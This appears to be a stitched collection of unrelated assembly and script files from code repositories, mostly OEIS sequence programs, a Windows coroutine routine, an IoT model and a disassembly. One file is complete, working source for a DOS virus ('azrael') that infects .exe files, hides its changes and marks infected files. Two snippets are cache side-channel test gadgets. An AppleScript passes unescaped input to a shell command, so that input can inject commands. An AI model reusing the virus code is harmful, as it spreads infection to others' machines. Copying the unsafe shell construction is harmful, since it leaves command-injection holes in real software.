.global s_prepare_buffers s_prepare_buffers: push %r11 push %r14 push %r15 push %rsi lea addresses_WC_ht+0x1cc6e, %r14 nop nop nop add %rsi, %rsi movl $0x61626364, (%r14) nop nop xor %r15, %r15 pop %rsi pop %r15 pop %r14 pop %r11 ret .global s_faulty_load s_faulty_load: push %r10 push %r11 push %r14 push %r9 push %rbx // Faulty Load lea addresses_WC+0x9a6e, %rbx nop nop nop nop nop cmp $64048, %r9 mov (%rbx), %r14 lea oracles, %rbx and $0xff, %r14 shlq $12, %r14 mov (%rbx,%r14,1), %r14 pop %rbx pop %r9 pop %r14 pop %r11 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 2, 'NT': False, 'type': 'addresses_WC'}, 'OP': 'LOAD'} [Faulty Load] {'src': {'congruent': 0, 'AVXalign': True, 'same': True, 'size': 8, 'NT': False, 'type': 'addresses_WC'}, 'OP': 'LOAD'} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'congruent': 8, 'AVXalign': False, 'same': False, 'size': 4, 'NT': False, 'type': 'addresses_WC_ht'}} {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
src/win64_masm.asm
willcassella/cro
0
160119
<gh_stars>0 .code cro_asm_start proc frame .setframe rbp, 0 .endprolog ; Pre: rbx = fiber_fn:cro::FiberFn*, rdi = root_fn:cro_RootFn*, rsi = arg:void* ; Move arguments into Win64 convention mov rcx, rbx mov rdx, rsi ; Allocate shadow space sub rsp, 32 ; Call into coroutine call rdi ; Restore outer mov rdx, rax xor r8d, r8d jmp cro_asm_restore ; Post: rdx = to:cro::FiberContext*, r8d = should_unwind:cro::SuspendResult(SR_CONTINUE) cro_asm_start endp cro_asm_init proc ; Pre: rcx = ctx:cro::FiberContext*, rdx = stack:void*, r8 = stack_size:size_t, r9 = root_fn:cro_RootFn*, [rsp+40] = coroutine_fn:cro::Coroutine*, [rsp+48] = arg:void* ; Create base pointer add rdx, r8 sub rdx, 24 ; Write null for base pointer and return address to fiber stack mov qword ptr [rdx + 8], 0 mov qword ptr [rdx + 16], 0 ; Write return address to fiber stack lea rax, cro_asm_start mov qword ptr [rdx], rax ; Write base pointer (rbp) to fiber stack lea rax, [rdx + 8] mov qword ptr [rdx - 8], rax ; Write fiber_fn (rbx) to fiber stack mov rax, qword ptr [rsp + 40] mov qword ptr [rdx - 16], rax ; Write root_fn (rdi) to fiber stack mov qword ptr [rdx - 24], r9 ; Write arg (rsi) to fiber stack mov rax, qword ptr [rsp + 48] mov qword ptr [rdx - 32], rax ; Compute stack pointer (account for r12 - r15, xmm6 - xmm15) and write to ctx sub rdx, 224 mov qword ptr [rcx], rdx ret ; Post: cro_asm_init endp cro_asm_switch proc ; Pre: rcx = from:cro::FiberContext*, rdx = to:cro::FiberContext*, r8d = should_unwind:cro::SuspendResult ; Back up non-volatile GP registers push rbp push rbx push rdi push rsi push r12 push r13 push r14 push r15 ; Back up xmm registers sub rsp, 160 movdqu xmmword ptr [rsp + 144], xmm6 movdqu xmmword ptr [rsp + 128], xmm7 movdqu xmmword ptr [rsp + 112], xmm8 movdqu xmmword ptr [rsp + 96], xmm9 movdqu xmmword ptr [rsp + 80], xmm10 movdqu xmmword ptr [rsp + 64], xmm11 movdqu xmmword ptr [rsp + 48], xmm12 movdqu xmmword ptr [rsp + 32], xmm13 movdqu xmmword ptr [rsp + 16], xmm14 movdqu xmmword ptr [rsp], xmm15 ; Save NT_TIB mov rax, qword ptr gs:[30h] mov rbx, qword ptr [rax + 20h] ; Fiber local storage push rbx mov rbx, qword ptr [rax + 1478h] ; Current deallocation stack push rbx mov rbx, qword ptr [rax + 10h] ; Current stack limit push rbx mov rbx, qword ptr [rax + 8h] ; Current stack base push rbx ; Save stack pointer mov qword ptr [rcx], rsp ; Post: rdx = to:cro::FiberContext*, r8d = should_unwind:cro::SuspendResult cro_asm_restore label ptr ; Pre: rdx = to:cro::FiberContext*, r8d = should_unwind:cro::SuspendResult ; Restore stack pointer from 'to' mov rsp, qword ptr [rdx] ; Null out the stack pointer to ensure they don't end up re-resuming this fiber accidentally mov qword ptr [rdx], 0 ; Load NT_TIB mov rax, qword ptr gs:[30h] pop rbx mov qword ptr [rax + 8h], rbx ; Current stack base pop rbx mov qword ptr [rax + 10h], rbx ; Current stack limit pop rbx mov qword ptr [rax + 1478h], rbx ; Curent deallocation stack pop rbx mov qword ptr [rax + 20h], rbx ; Fiber local storage ; Restore xmm registers movdqu xmm15, xmmword ptr [rsp] movdqu xmm14, xmmword ptr [rsp + 16] movdqu xmm13, xmmword ptr [rsp + 32] movdqu xmm12, xmmword ptr [rsp + 48] movdqu xmm11, xmmword ptr [rsp + 64] movdqu xmm10, xmmword ptr [rsp + 80] movdqu xmm9, xmmword ptr [rsp + 96] movdqu xmm8, xmmword ptr [rsp + 112] movdqu xmm7, xmmword ptr [rsp + 128] movdqu xmm6, xmmword ptr [rsp + 144] add rsp, 160 ; Restore non-volatile GP registers pop r15 pop r14 pop r13 pop r12 pop rsi pop rdi pop rbx pop rbp ; Jump back into fiber code mov eax, r8d ret ; Post: eax = should_unwind:cro::SuspendResult cro_asm_switch endp end
programs/oeis/020/A020721.asm
jmorken/loda
1
17628
; A020721: Pisot sequences E(7,10), P(7,10). ; 7,10,14,20,29,42,61,89,130,190,278,407,596,873,1279,1874,2746,4024,5897,8642,12665,18561,27202,39866,58426,85627,125492,183917,269543,395034,578950,848492,1243525,1822474,2670965,3914489,5736962,8407926,12322414,18059375,26467300,38789713,56849087,83316386,122106098,178955184,262271569,384377666,563332849,825604417,1209982082,1773314930,2598919346,3808901427,5582216356,8181135701,11990037127,17572253482,25753389182,37743426308,55315679789,81069068970,118812495277,174128175065,255197244034,374009739310,548137914374,803335158407,1177344897716,1725482812089,2528817970495,3706162868210,5431645680298,7960463650792,11666626519001,17098272199298,25058735850089,36725362369089,53823634568386,78882370418474,115607732787562,169431367355947,248313737774420,363921470561981,533352837917927,781666575692346,1145588046254326,1678940884172252,2460607459864597,3606195506118922,5285136390291173,7745743850155769 add $0,4 lpb $0 sub $0,1 trn $2,$3 add $2,$4 mov $4,$3 sub $3,$3 add $3,$1 add $1,$2 add $1,1 lpe add $1,2
FormalAnalyzer/models/apps/ID14LockDoorWhenHomeModeSet+.als
Mohannadcse/IoTCOM_BehavioralRuleExtractor
0
2994
module app_ID14LockDoorWhenHomeModeSet open IoTBottomUp as base open cap_location open cap_lock one sig app_ID14LockDoorWhenHomeModeSet extends IoTApp { lock : one cap_lock, state : one cap_state, location : one cap_location, } { rules = r } one sig cap_state extends Capability {} { attributes = cap_state_attr } abstract sig cap_state_attr extends Attribute {} one sig cap_state_attr_home extends cap_state_attr {} { values = cap_state_attr_home_val } abstract sig cap_state_attr_home_val extends AttrValue {} one sig cap_state_attr_home_val_true extends cap_state_attr_home_val {} // application rules base class abstract sig r extends Rule {} one sig r0 extends r {}{ no triggers no conditions commands = r0_comm } abstract sig r0_comm extends Command {} one sig r0_comm0 extends r0_comm {} { capability = app_ID14LockDoorWhenHomeModeSet.state attribute = cap_state_attr_home value = cap_state_attr_home_val_true } one sig r0_comm1 extends r0_comm {} { capability = app_ID14LockDoorWhenHomeModeSet.lock attribute = cap_lock_attr_lock value = cap_lock_attr_lock_val_locked }
programs/oeis/011/A011869.asm
karttu/loda
1
7807
; A011869: a(n) = floor(n*(n-1)/16). ; 0,0,0,0,0,1,1,2,3,4,5,6,8,9,11,13,15,17,19,21,23,26,28,31,34,37,40,43,47,50,54,58,62,66,70,74,78,83,87,92,97,102,107,112,118,123,129,135,141,147,153,159,165,172,178,185,192,199,206,213,221,228,236,244,252,260,268,276,284,293,301,310,319,328,337,346,356,365,375,385,395,405,415,425,435,446,456,467,478,489,500,511,523,534,546,558,570,582,594,606,618,631,643,656,669,682,695,708,722,735,749,763,777,791,805,819,833,848,862,877,892,907,922,937,953,968,984,1000,1016,1032,1048,1064,1080,1097,1113,1130,1147,1164,1181,1198,1216,1233,1251,1269,1287,1305,1323,1341,1359,1378,1396,1415,1434,1453,1472,1491,1511,1530,1550,1570,1590,1610,1630,1650,1670,1691,1711,1732,1753,1774,1795,1816,1838,1859,1881,1903,1925,1947,1969,1991,2013,2036,2058,2081,2104,2127,2150,2173,2197,2220,2244,2268,2292,2316,2340,2364,2388,2413,2437,2462,2487,2512,2537,2562,2588,2613,2639,2665,2691,2717,2743,2769,2795,2822,2848,2875,2902,2929,2956,2983,3011,3038,3066,3094,3122,3150,3178,3206,3234,3263,3291,3320,3349,3378,3407,3436,3466,3495,3525,3555,3585,3615,3645,3675,3705,3736,3766,3797,3828,3859 bin $0,2 div $0,8 mov $1,$0
oeis/145/A145716.asm
neoneye/loda-programs
11
9055
; A145716: Numbers Y such that 381*Y^2+127 is a square. ; Submitted by <NAME>(s1) ; 13,26403,53598077,108804069907,220872208313133,448370474071590083,910191841493119555357,1847688989860558625784627,3750807739225092517223237453,7614137862937947949404546244963,15456696110956295112198711654037437 mov $3,1 lpb $0 sub $0,$3 add $4,1 mov $1,$4 mul $1,2028 add $2,$1 add $4,$2 add $4,1 lpe mov $0,$4 mul $0,13 add $0,13
launchbar/Pushover to Air.applescript
Brickstertwo/applescripts
0
1391
on handle_string(message) do shell script "~/Development/bash/commands/bin/pushover -m \"" & message & "\" -t \"LaunchBar\" -d \"Air\"" end handle_string
Transynther/x86/_processed/NONE/_xt_sm_/i7-8650U_0xd2_notsx.log_1142_1555.asm
ljhsiun2/medusa
9
99034
.global s_prepare_buffers s_prepare_buffers: push %r10 push %r13 push %rbp push %rbx push %rcx push %rdi push %rsi lea addresses_UC_ht+0x104c8, %rsi lea addresses_WC_ht+0x13848, %rdi clflush (%rdi) xor $38783, %r13 mov $45, %rcx rep movsq nop nop and $35277, %rcx lea addresses_UC_ht+0x11aa8, %rbx nop nop nop nop inc %r10 mov $0x6162636465666768, %rdi movq %rdi, %xmm3 movups %xmm3, (%rbx) nop nop nop cmp %rbx, %rbx lea addresses_D_ht+0x1a4b0, %r10 nop and $307, %rbx mov (%r10), %rsi nop nop cmp $18448, %r10 lea addresses_normal_ht+0x15268, %rsi lea addresses_normal_ht+0x2ce8, %rdi sub $45142, %rbp mov $54, %rcx rep movsb nop nop nop nop nop add $56890, %rbp pop %rsi pop %rdi pop %rcx pop %rbx pop %rbp pop %r13 pop %r10 ret .global s_faulty_load s_faulty_load: push %r11 push %r13 push %r8 push %r9 push %rcx push %rdi push %rsi // Store lea addresses_WC+0x48e8, %r11 nop cmp $20582, %rdi movb $0x51, (%r11) sub $32549, %r11 // Store lea addresses_PSE+0x1b4e8, %r9 nop nop xor $31754, %r13 movl $0x51525354, (%r9) nop nop nop nop nop dec %r8 // Store lea addresses_D+0x1ee8, %r11 nop nop sub $13458, %rsi movl $0x51525354, (%r11) inc %r11 // Faulty Load lea addresses_PSE+0x1b4e8, %r8 nop sub %rcx, %rcx movups (%r8), %xmm7 vpextrq $0, %xmm7, %rdi lea oracles, %r11 and $0xff, %rdi shlq $12, %rdi mov (%r11,%rdi,1), %rdi pop %rsi pop %rdi pop %rcx pop %r9 pop %r8 pop %r13 pop %r11 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'type': 'addresses_PSE', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 9, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_PSE', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}} {'OP': 'STOR', 'dst': {'type': 'addresses_D', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 7, 'same': False}} [Faulty Load] {'OP': 'LOAD', 'src': {'type': 'addresses_PSE', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}} <gen_prepare_buffer> {'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 5, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 4, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': True}} {'OP': 'LOAD', 'src': {'type': 'addresses_D_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': False}} {'OP': 'REPM', 'src': {'type': 'addresses_normal_ht', 'congruent': 7, 'same': False}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 11, 'same': False}} {'54': 1142} 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 54 */
oeis/101/A101680.asm
neoneye/loda-programs
11
245344
; A101680: A modular binomial transform of 10^n. ; Submitted by <NAME> ; 1,11,111,1011,10111,111011,1100111,10001011,100010111,1100111011,11101100111,101110001011,1011000010111,11100000111011,110000001100111,1000000010001011,10000000100010111,110000001100111011 mul $0,2 seq $0,101623 ; Modular binomial transform of 10^n.
programs/oeis/047/A047545.asm
karttu/loda
1
14909
<gh_stars>1-10 ; A047545: Numbers that are congruent to {0, 1, 3, 4, 7} mod 8. ; 0,1,3,4,7,8,9,11,12,15,16,17,19,20,23,24,25,27,28,31,32,33,35,36,39,40,41,43,44,47,48,49,51,52,55,56,57,59,60,63,64,65,67,68,71,72,73,75,76,79,80,81,83,84,87,88,89,91,92,95,96,97,99,100,103,104 mov $2,$0 add $0,1 mul $0,2 mov $1,$0 div $1,5 mul $1,6 div $1,4 add $1,$2
libsrc/stdio/ansi/vz200/f_ansi_cls.asm
andydansby/z88dk-mk2
1
81854
<reponame>andydansby/z88dk-mk2 ; ; ANSI Video handling for the VZ200 ; ; CLS - Clear the screen ; ; ; <NAME> - Apr. 2000 ; ; ; $Id: f_ansi_cls.asm,v 1.3 2003/09/30 10:23:12 stefano Exp $ ; XLIB ansi_cls .ansi_cls ld a,0 ld (6800h),a ; force TEXT mode ld hl,$7000 ld (hl),32 ;' ' ld d,h ld e,l inc de ld bc,511 ldir ;;; ;;; The ROM cls call: ;;; call 457 ;;; ret
MSDOS/Virus.MSDOS.Unknown.azrael.asm
fengjixuchui/Family
3
100115
start: call delta delta: pop bp sub bp,offset delta mov ax,0faceh push ax pop ax cli dec sp dec sp sti pop bx cmp bx,ax je its_ok mov ax,4c00h int 21h its_ok: mov word ptr[bp+saved_ds],ds push cs push cs pop ds pop es lea si,[bp+old_ip] lea di,[bp+original_ip] mov cx,4 rep movsw mov ah,1ah lea dx,[bp+ende] int 21h mov ah,4eh lea dx,[bp+file_spec] mov cx,7 find_next: int 21h jc before_restore mov ax,4300h lea dx,[bp+ende+1eh] int 21h mov word ptr[bp+attribs],cx mov ax,4301h xor cx,cx lea dx,[bp+ende+1eh] int 21h lea dx,[bp+ende+1eh] call open mov bx,ax mov ax,5700h int 21h mov word ptr[bp+time],cx mov word ptr[bp+date],dx mov cx,1ah lea dx,[bp+exe_header] call read cmp word ptr [bp+exe_header],'ZM' je check_infected cmp word ptr [bp+exe_header],'MZ' je check_infected jmp close check_infected: cmp word ptr [bp+exe_header+12h],'V' je close call save_exe_header mov al,02 call seek mov word ptr[bp+file_size_ax],ax mov word ptr[bp+file_size_dx],dx call calculate_new_cs_ip mov ax,word ptr[bp+file_size_ax] mov dx,word ptr[bp+file_size_dx] call calculate_new_size push byte ptr [bp+counter] mov byte ptr[bp+counter],0 jmp goon before_restore: jmp restore goon: mov cx,ende-start lea dx,[bp+start] call write pop byte ptr [bp+counter] mov al,0 call seek mov cx,1ah lea dx,[bp+exe_header] call write inc byte ptr[bp+counter] close: mov ax,5701h mov cx,word ptr[bp+time] mov dx,word ptr[bp+date] int 21h mov ah,3eh int 21h mov ax,4301h lea dx,[bp+ende+1eh] mov cx,word ptr[bp+attribs] int 21h cmp byte ptr[bp+counter],3 je restore mov ah,4fh jmp find_next restore: mov ax,word ptr[bp+saved_ds] mov ds,ax mov ah,1ah mov dx,80h int 21h push ds pop es mov ax,es add ax,10h ;add ajustment for PSP add word ptr cs:[original_CS+bp],ax ;Adjust old CS by ;current seg cli add ax,word ptr cs:[bp+original_SS] ;Adjust old SS mov ss,ax ;Restore stack to mov sp,word ptr cs:[bp+original_SP] ;original position sti db 0eah original_ip dw ? original_cs dw ? original_sp dw ? original_ss dw ? ;*****************; ; SUB - FUNCTIONS ; ;*****************; save_exe_header: push word ptr[bp+exe_header+0eh] pop word ptr[bp+old_ss] push word ptr[bp+exe_header+10h] pop word ptr[bp+old_sp] push word ptr[bp+exe_header+14h] pop word ptr[bp+old_ip] push word ptr[bp+exe_header+16h] pop word ptr[bp+old_cs] ret calculate_new_cs_ip: mov ax,word ptr [exe_header+bp+8] ;Get header length mov cl,4 ;and convert it to shl ax,cl ;bytes. mov cx,ax mov ax,word ptr[bp+file_size_ax] sub ax,cx ;Subtract header sbb dx,0 ;size from file ;size for memory ;adjustments mov cl,0ch ;Convert DX into shl dx,cl ;segment Address mov cl,4 push ax ;Change offset (AX) into shr ax,cl ;segment, except for last add dx,ax ;digit. Add to DX and shl ax,cl ;save DX as new CS, put pop cx ;left over into CX and sub cx,ax ;store as the new IP. mov word ptr [exe_header+bp+14h],cx mov word ptr [exe_header+bp+16h],dx ;Set new CS:IP mov word ptr [exe_header+bp+0eh],dx ;Set new SS = CS mov word ptr [exe_header+bp+10h],0fffe ;Set new SP mov byte ptr [exe_header+bp+12h],'V' ;mark infection ret calculate_new_size: add ax,ende-start ;Add virus size to DX:AX adc dx,0 mov cl,7 shl dx,cl ;convert DX to pages mov cl,9 shr ax,cl add ax,dx inc ax mov word ptr [exe_header+bp+04],ax ;save # of pages mov ax,word ptr[bp+file_size_ax] mov dx,ax shr ax,cl ;Calc remainder shl ax,cl ;in last page sub dx,ax mov word ptr [exe_header+bp+02],dx ;save remainder ret seek: mov ah,42h xor cx,cx xor dx,dx int 21h ret read: mov ah,3fh int 21h ret write: mov ah,40h int 21h ret open: mov ax,3d02h int 21h ret saved_ds dw ? exe_header db 1ah dup(?) old_ip dw 0 old_cs dw 0fff0h old_sp dw 0 old_ss dw 0fff0h file_spec db '*.exe',0 file_size_ax dw ? file_size_dx dw ? attribs dw ? time dw ? date dw ? counter db 0 copyright db 'AZRAEL / Copyright by Spo0ky / Austria 1997',0 ende:
programs/oeis/052/A052254.asm
neoneye/loda
22
102669
; A052254: Partial sums of A050406. ; 1,17,108,444,1410,3762,8844,18876,37323,69355,122408,206856,336804,531012,813960,1217064,1780053,2552517,3595636,4984100,6808230,9176310,12217140,16082820,20951775,27032031,34564752,43828048,55141064,68868360,85424592,105279504,128963241,157071993,190273980,229315788,275029066,328337594,390264732,461941260,544613619,639652563,748562232,872989656,1014734700,1175760460,1358204120,1564388280,1796832765,2058266925,2351642436,2680146612,3047216238,3456551934,3912133060,4418233172,4979436039,5600652231,6287136288,7044504480,7878753168,8796277776,9803892384,10908849952,12118863185,13442126049,14887335948,16463716572,18181041426,20049658050,22080512940,24285177180,26675872795,29265499835,32067664200,35096706216,38367729972,41896633428,45700139304,49795826760,54202163877,58938540949,64025304596,69483792708,75336370230,81606465798,88318609236,95498469924,103172896047,111369954735,120118973104,129450580208,139396749912,149990844696,161267660400,173263471920,186016079865,199564858185,213950802780,229216581100 lpb $0 mov $2,$0 sub $0,1 seq $2,50406 ; Partial sums of A051880. add $1,$2 lpe add $1,1 mov $0,$1
library/02_functions_batch1/unknown_10008a80.asm
SamantazFox/dds140-reverse-engineering
1
245116
10008a80: 55 push ebp 10008a81: 8b ec mov ebp,esp 10008a83: 6a fe push 0xfffffffe 10008a85: 68 68 e5 00 10 push 0x1000e568 10008a8a: 68 90 58 00 10 push 0x10005890 10008a8f: 64 a1 00 00 00 00 mov eax,fs:0x0 10008a95: 50 push eax 10008a96: 83 ec 08 sub esp,0x8 10008a99: 53 push ebx 10008a9a: 56 push esi 10008a9b: 57 push edi 10008a9c: a1 10 00 01 10 mov eax,ds:0x10010010 10008aa1: 31 45 f8 xor DWORD PTR [ebp-0x8],eax 10008aa4: 33 c5 xor eax,ebp 10008aa6: 50 push eax 10008aa7: 8d 45 f0 lea eax,[ebp-0x10] 10008aaa: 64 a3 00 00 00 00 mov fs:0x0,eax 10008ab0: 89 65 e8 mov DWORD PTR [ebp-0x18],esp 10008ab3: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-0x4],0x0 10008aba: 68 00 00 00 10 push 0x10000000 10008abf: e8 3c ff ff ff call 0x10008a00 10008ac4: 83 c4 04 add esp,0x4 10008ac7: 85 c0 test eax,eax 10008ac9: 74 55 je 0x10008b20 10008acb: 8b 45 08 mov eax,DWORD PTR [ebp+0x8] 10008ace: 2d 00 00 00 10 sub eax,0x10000000 10008ad3: 50 push eax 10008ad4: 68 00 00 00 10 push 0x10000000 10008ad9: e8 52 ff ff ff call 0x10008a30 10008ade: 83 c4 08 add esp,0x8 10008ae1: 85 c0 test eax,eax 10008ae3: 74 3b je 0x10008b20 10008ae5: 8b 40 24 mov eax,DWORD PTR [eax+0x24] 10008ae8: c1 e8 1f shr eax,0x1f 10008aeb: f7 d0 not eax 10008aed: 83 e0 01 and eax,0x1 10008af0: c7 45 fc fe ff ff ff mov DWORD PTR [ebp-0x4],0xfffffffe 10008af7: 8b 4d f0 mov ecx,DWORD PTR [ebp-0x10] 10008afa: 64 89 0d 00 00 00 00 mov DWORD PTR fs:0x0,ecx 10008b01: 59 pop ecx 10008b02: 5f pop edi 10008b03: 5e pop esi 10008b04: 5b pop ebx 10008b05: 8b e5 mov esp,ebp 10008b07: 5d pop ebp 10008b08: c3 ret 10008b09: 8b 45 ec mov eax,DWORD PTR [ebp-0x14] 10008b0c: 8b 08 mov ecx,DWORD PTR [eax] 10008b0e: 8b 01 mov eax,DWORD PTR [ecx] 10008b10: 33 d2 xor edx,edx 10008b12: 3d 05 00 00 c0 cmp eax,0xc0000005 10008b17: 0f 94 c2 sete dl 10008b1a: 8b c2 mov eax,edx 